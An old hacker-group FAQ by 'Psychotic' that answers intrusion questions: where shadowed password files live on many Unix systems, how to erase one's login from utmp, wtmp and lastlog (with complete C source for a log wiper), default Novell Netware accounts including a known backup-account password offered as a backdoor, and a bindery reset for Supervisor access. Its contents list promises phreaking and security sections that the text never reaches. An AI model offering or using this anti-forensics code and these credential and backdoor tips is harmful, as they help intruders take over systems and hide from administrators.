hacking faq.txt

黑客培训教程

Psychotic's FAQ
by Virtual Circuit and Psychotic

I. HACKING
* What is hacking?
* How do I crack shadowed passwords?
* How can I tell the difference between an encrypted password and a shadowed password?
* Where can I find the password file if it's shadowed?
* Where is the password file located?
* What is an exploit?
* What are some basic telnet commands?
* How do I get out of the log file?
* What is a DNIC?
* What is an NUA?
* What is a VAX/VMS?
* What is telnet?
* What is an anonymous remailer?
* What is PGP?
* What is a tcp/ip?
* What is a virus?
* What is a trojan?
* What is a worm?
* What do I need to become a hacker?
* What are some common accounts for Novell Netware?
* How can I gain supervisor access to Novell Netware?
* How do I access the passwords for Novell?
* How do I crack a Novell Netware password?
* What are the domain codes?
II. PHREAKING
* What is phreaking?
* How do I start phreaking?
* What are boxes?
* What kind of boxes are there?
* How do I make a box?
* What is a loop?
III.  Security
* How do I set up an anonymous FTP server?
* What are some ways that I can secure a network?
* What is a "rainbow book?"
* What is a sniffer?
* What is a firewall?
* How can I use PGP to benefit me?
IV.  Group Questions
* What is Psychotic?
* Is Psychotic looking for new members?
* What is Psychosis?
* What is the "Devil's Gateway?"
* Where can I find some good resources on hacking and phreaking?
* Who are all the members in Psychotic?
* What are Psychotic's offered services?

Q. What is hacking?

A. Hacking is the art of breaking into computers to gain knowledge that our society has hidden from us. Hacking is illegal and the government spend lots of money each year to have hackers arrested.....when they should be spending the money on more important issues.

Q. What is a shadowed password?

A. A shadowed password is a cover for the real password file. It shows that the real password is hidden somewhere else.

Q. How do I crack shadowed passwords?

A. Cracking a shadowed password file is impossible. Assuming that you got the password file via anonymous ftp. You should try connecting to port 25 and doing the sendmail bug.

Q. What is the difference between an encrypted password and a shadowed password?

A. An encrypted password is just the real password scrambled and changed. It can be cracked with a password cracked and a word file. A shadowed password hides the encrypted password somewhere else other than the etc. dir.

Q.  Where can I find the password file if it's shadowed?

A. Unix                  Path                            Token
-----------------------------------------------------------------
AIX 3                 /etc/security/passwd            !
          or             /tcb/auth/files//
A/UX 3.0s             /tcb/files/auth/?/*
BSD4.3-Reno           /etc/master.passwd              *
ConvexOS 10           /etc/shadpw                     *
ConvexOS 11           /etc/shadow                     *
DG/UX                 /etc/tcb/aa/user/               *
EP/IX                 /etc/shadow                     x
HP-UX                 /.secure/etc/passwd             *
IRIX 5                /etc/shadow                     x
Linux 1.1             /etc/shadow                     *
OSF/1                 /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x        /tcb/auth/files//
SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
SunOS 5.0             /etc/shadow
                                  
System V Release 4.0  /etc/shadow                     x
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]            *
UNICOS                /etc/udb                        *

Q. Where is the password file located?

A. The password file is located in the etc/passwd dir. You can get into the etc dir by logging on to the domain via anonymous ftp. 

Q. What is an exploit?

A. An exploit is something that exploits unix or another kind of OS. You usually use exploits to gain root or high access to a system. They can prove to be very handy.

Q. What are some basic telnet commands?

A. Below is a list of common telnet commands.

Command                                                          Function

access						Telnet account
c						Connect to a host
cont						Continue
d						Disconnect
full						Network echo
half						Terminal echo
hangup						Hangs up
mail						Mail
set						Select PAD parameters
stat						Show network port.
telemail						Mail

Q.  How do I get out of the log file?

A. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.
Example:

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
 
int f;
 
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;
 
  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                          bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                          lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                          write (f, &utmp_ent, sizeof (utmp_ent));
                  }
        close(f);
  }
}
 
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;
 
    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
 
        while(pos != -1L) {
           lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
           if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
                pos = -1L;
           } else {
                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                        bzero((char *)&utmp_ent,sizeof(struct utmp ));
                        lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
                        write (f, &utmp_ent, sizeof (utmp_ent));
                        pos = -1L;
                } else pos += 1L;
           }
        }
        close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
        if ((pwd=getpwnam(who))!=NULL) {
 
           if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
                  lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
                  bzero((char *)&newll,sizeof( newll ));
                  write(f, (char *)&newll, sizeof( newll ));
                  close(f);
           }
 
    } else printf("%s: ?\n",who);
}
 
main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
           kill_lastlog(argv[1]);
           kill_wtmp(argv[1]);
           kill_utmp(argv[1]);
           printf("Zap2!\n");
    } else
    printf("Error.\n");
}

Q. What is DNIC?

A. A DNIS says which network connect to the telnet you are using.

Q. What is NUA?

A.  The NUA is the address of the computer on telnet.

Q.  What is a VAX/VMS?

A.  A vax/vms is Digital Equipment's major computer line. It's proprietary operating system is known as vms.

Q.  What is telnet?

A. Telnet is a program which lets you log in to other computers on the net.

Q.  What is an anonymous remailer?

A. An anonymous remailer is a system on the Internet that allows you to send e-mail anonymously or post messages to Usenet anonymously. You apply for an anonymous ID at the remailer site. Then, when you send a message to the remailer, it sends it out from your anonymous ID at the remailer. No one reading the post will know your real account name or host name. If someone sends a message to your anonymous ID, it will be forwarded to your real account by the remailer.

Q.  What is PGP?

A. This FAQ answer is excerpted from:
PGP(tm) User's Guide Volume I: Essential Topics by Philip Zimmermann
PGP(tm) uses public-key encryption to protect E-mail and data files. Communicate securely with
people you've never met, with no secure channels needed for prior exchange of keys. PGP is well
featured and fast, with sophisticated key management, digital signatures, data compression, and
good ergonomic design.
Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a high security cryptographic software application for MS-DOS, Unix, VAX/VMS, and other computers. PGP allows people toexchange files or messages with privacy, authentication, and convenience. Privacy means that only those intended to receive a message can read it. Authentication means that messages that appear to be from a particular person can only have originated from that person. Convenience means that privacy and authentication are provided without the hassles of managing keys associated with conventional cryptographic software. No secure channels are needed to exchange keys between users, which makes PGP much easier to use. This is because PGP is based on a powerful new technology called "public key" cryptography. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA) public key cryptosystem with the speed of conventional cryptography, message digests for digital signatures, data compression before encryption, good ergonomic design, and sophisticated key management. And PGP performs the public-key functions faster than most other software implementations. PGP is public key cryptography for the masses.

Q.  What is tcp/ip?

A. Tcp/ip is the system networks use to communicate with each other. It stands for Transmission Control Protocol/Internet Protocol.

Q. What is a virus?

A.  A Virus is a program which reproduces itself. It may attach itself to other programs, it may create copies of itself. It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some Viruse scanners detect some Viruses. No Virus scanners detect all Viruses. Virus scanners will work for a while but people are always creating virii that will beat them.

Q.  What is a trojan?

A.  A trojan is a program which does an unauthorized function, hidden inside an authorized program. It does something other than it claims to do, usually something malicious, and it is intended by the author to do whatever it does. If it is not intentional, it is called a bug. 

Q.  What is a worm?

A.  Worms are programsthat copy themselves over and over using up space and slowing down the system. They are self contained and use the networks to spread, in much the same way that Viruses use files to spread. Some people say the solution to Viruses and worms is to just not have any files or networks. 


Q.  What do I need to become a hacker?

A.  You should start off with a good scanner, some dialups, a telnet client, and some knowladge of hacking. Those are the basic things that you will need. If you are serious about hacking then you should get Unix, or Linux(smaller, free version of unix).

Q.  What are some common accounts for Novell Netware?

A.   Below is a list of commonly used accounts for Novell Netware.
       Account         Purpose
        ----------      ------------------------------------------------------
        PRINT           Attaching to a second server for printing
        LASER           Attaching to a second server for printing
        HPLASER         Attaching to a second server for printing
        PRINTER         Attaching to a second server for printing
        LASERWRITER     Attaching to a second server for printing
        POST            Attaching to a second server for email
        MAIL            Attaching to a second server for email
        GATEWAY         Attaching a gateway machine to the server
        GATE            Attaching a gateway machine to the server
        ROUTER          Attaching an email router to the server
        BACKUP          May have password/station restrictions (see below), used
                        for backing up the server to a tape unit attached to a
                        workstation. For complete backups, Supervisor equivalence
                        is required.
        WANGTEK         See BACKUP
        FAX             Attaching a dedicated fax modem unit to the network
        FAXUSER         Attaching a dedicated fax modem unit to the network
        FAXWORKS        Attaching a dedicated fax modem unit to the network
        TEST            A test user account for temp use
        ARCHIVIST       Palidrome default account for backup
        CHEY_ARCHSVR    An account for Arcserve to login to the server from    
                        from the console for tape backup. Version 5.01g's
                        password was WONDERLAND. Delete the Station
                        Restrictions and use SUPER.EXE to toggle this 
                        account and you have an excellent backdoor.
        WINDOWS_PASSTHRU Although not required, per the Microsoft Win95
                        Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
                        need this for resource sharing without a password.

Q.  How can I gain supervisor access to Novell Netware?

A. Taken from the Novell Netware FAQ.
The secret method is the method of using a DOS-based sector editor to edit the 
entry in the FAT, and reset the bindery to default upon server reboot. This gives 
you Supervisor and Guest with no passwords. The method was taught in case you 
lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts 
created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.


Q.  How do I access the password file for Novell?

A. access to the password file in Netware is not like Unix - the password file isn't in the open. All objects and their properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS
database in 4.x. An example of an object might be a printer, a group, an individual's account etc. An example of an object's properties might include an account's password or full user name, or a group's member list or full name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden
and System, and these files are located on the SYS: volume in the SYSTEM subdirectory. Their names are as follows:

        Netware version         File Names
        ---------------         ----------
        2.x                     NET$BIND.SYS, NET$BVAL.SYS
        3.x                     NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS

The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
in 2.x and 3.x respectively.